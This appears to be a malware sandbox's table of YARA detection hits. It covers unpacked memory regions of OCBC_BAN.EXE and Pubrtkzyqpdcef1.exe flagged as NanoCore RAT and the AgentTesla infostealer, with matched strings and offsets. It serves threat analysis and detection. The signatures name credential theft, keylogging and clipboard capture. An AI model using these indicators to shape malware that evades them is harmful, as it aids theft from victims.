12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0xf76c:$i2: IClientData 0xf78e:$i3: IClientNetwork 0xf79d:$i5: IClientDataHost 0xf7c7:$i6: IClientLoggingHost 0xf7da:$i7: IClientNetworkHost 0xf7ed:$i8: IClientUIHost 0xf7fb:$i9: IClientNameObjectCollection 0xf817:$i10: IClientReadOnlyNameObjectCollection 0xf56a:$s1: ClientPlugin 0xf781:$s1: ClientPlugin 0x147a2:$s6: get_ClientSettings
0.2.OCBC_BAN.EXE.2cd8784.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.OCBC_BAN.EXE.2cd8784.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0xe3b7:$s5: IClientLoggingHost
0.2.OCBC_BAN.EXE.2cd8784.1.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
0.2.OCBC_BAN.EXE.2cd8784.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q 0xf0fc:$j: #=q 0xf118:$j: #=q
12.0.OCBC_BAN.EXE.400000.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.0.OCBC_BAN.EXE.400000.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.0.OCBC_BAN.EXE.400000.10.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.0.OCBC_BAN.EXE.400000.10.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
12.0.OCBC_BAN.EXE.400000.10.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x326a2:$s10: logins 0x32109:$s11: credential 0x2e6e6:$g1: get_Clipboard 0x2e6f4:$g2: get_Keyboard 0x2e701:$g3: get_Password 0x2f9e4:$g4: get_CtrlKeyDown 0x2f9f4:$g5: get_ShiftKeyDown 0x2fa05:$g6: get_AltKeyDown
12.2.OCBC_BAN.EXE.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.OCBC_BAN.EXE.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.2.OCBC_BAN.EXE.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.OCBC_BAN.EXE.400000.0.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
12.2.OCBC_BAN.EXE.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
0.3.OCBC_BAN.EXE.a7b3e38.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.3.OCBC_BAN.EXE.a7b3e38.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.3.OCBC_BAN.EXE.a7b3e38.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x308a2:$s10: logins 0x30309:$s11: credential 0x2c8e6:$g1: get_Clipboard 0x2c8f4:$g2: get_Keyboard 0x2c901:$g3: get_Password 0x2dbe4:$g4: get_CtrlKeyDown 0x2dbf4:$g5: get_ShiftKeyDown 0x2dc05:$g6: get_AltKeyDown
12.0.OCBC_BAN.EXE.400000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.0.OCBC_BAN.EXE.400000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.0.OCBC_BAN.EXE.400000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.0.OCBC_BAN.EXE.400000.4.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
12.0.OCBC_BAN.EXE.400000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
9.0.Pubrtkzyqpdcef1.exe.e30000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.0.Pubrtkzyqpdcef1.exe.e30000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
9.0.Pubrtkzyqpdcef1.exe.e30000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x326a2:$s10: logins 0x32109:$s11: credential 0x2e6e6:$g1: get_Clipboard 0x2e6f4:$g2: get_Keyboard 0x2e701:$g3: get_Password 0x2f9e4:$g4: get_CtrlKeyDown 0x2f9f4:$g5: get_ShiftKeyDown 0x2fa05:$g6: get_AltKeyDown
0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
12.2.OCBC_BAN.EXE.5300000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
12.2.OCBC_BAN.EXE.5300000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
12.2.OCBC_BAN.EXE.5300000.6.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
0.3.OCBC_BAN.EXE.a803e58.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.3.OCBC_BAN.EXE.a803e58.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.3.OCBC_BAN.EXE.a803e58.1.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x308a2:$s10: logins 0x30309:$s11: credential 0x2c8e6:$g1: get_Clipboard 0x2c8f4:$g2: get_Keyboard 0x2c901:$g3: get_Password 0x2dbe4:$g4: get_CtrlKeyDown 0x2dbf4:$g5: get_ShiftKeyDown 0x2dc05:$g6: get_AltKeyDown
0.2.OCBC_BAN.EXE.3d32ef0.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.OCBC_BAN.EXE.3d32ef0.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.OCBC_BAN.EXE.3d32ef0.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.OCBC_BAN.EXE.3d32ef0.5.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
0.2.OCBC_BAN.EXE.3d32ef0.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
12.2.OCBC_BAN.EXE.3a1ff24.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
12.2.OCBC_BAN.EXE.3a1ff24.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
12.2.OCBC_BAN.EXE.3a1ff24.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.OCBC_BAN.EXE.3a1ff24.4.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xd978:$x2: NanoCore.ClientPlugin 0xd9ad:$x3: NanoCore.ClientPluginHost 0xd96c:$i2: IClientData 0xd98e:$i3: IClientNetwork 0xd99d:$i5: IClientDataHost 0xd9c7:$i6: IClientLoggingHost 0xd9da:$i7: IClientNetworkHost 0xd9ed:$i8: IClientUIHost 0xd9fb:$i9: IClientNameObjectCollection 0xda17:$i10: IClientReadOnlyNameObjectCollection 0xd76a:$s1: ClientPlugin 0xd981:$s1: ClientPlugin 0x129a2:$s6: get_ClientSettings
9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x326a2:$s10: logins 0x32109:$s11: credential 0x2e6e6:$g1: get_Clipboard 0x2e6f4:$g2: get_Keyboard 0x2e701:$g3: get_Password 0x2f9e4:$g4: get_CtrlKeyDown 0x2f9f4:$g5: get_ShiftKeyDown 0x2fa05:$g6: get_AltKeyDown
12.0.OCBC_BAN.EXE.400000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.0.OCBC_BAN.EXE.400000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.0.OCBC_BAN.EXE.400000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.0.OCBC_BAN.EXE.400000.6.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
12.0.OCBC_BAN.EXE.400000.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
12.0.OCBC_BAN.EXE.400000.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.0.OCBC_BAN.EXE.400000.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.0.OCBC_BAN.EXE.400000.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.0.OCBC_BAN.EXE.400000.8.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
12.0.OCBC_BAN.EXE.400000.8.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x326a2:$s10: logins 0x32109:$s11: credential 0x2e6e6:$g1: get_Clipboard 0x2e6f4:$g2: get_Keyboard 0x2e701:$g3: get_Password 0x2f9e4:$g4: get_CtrlKeyDown 0x2f9f4:$g5: get_ShiftKeyDown 0x2fa05:$g6: get_AltKeyDown
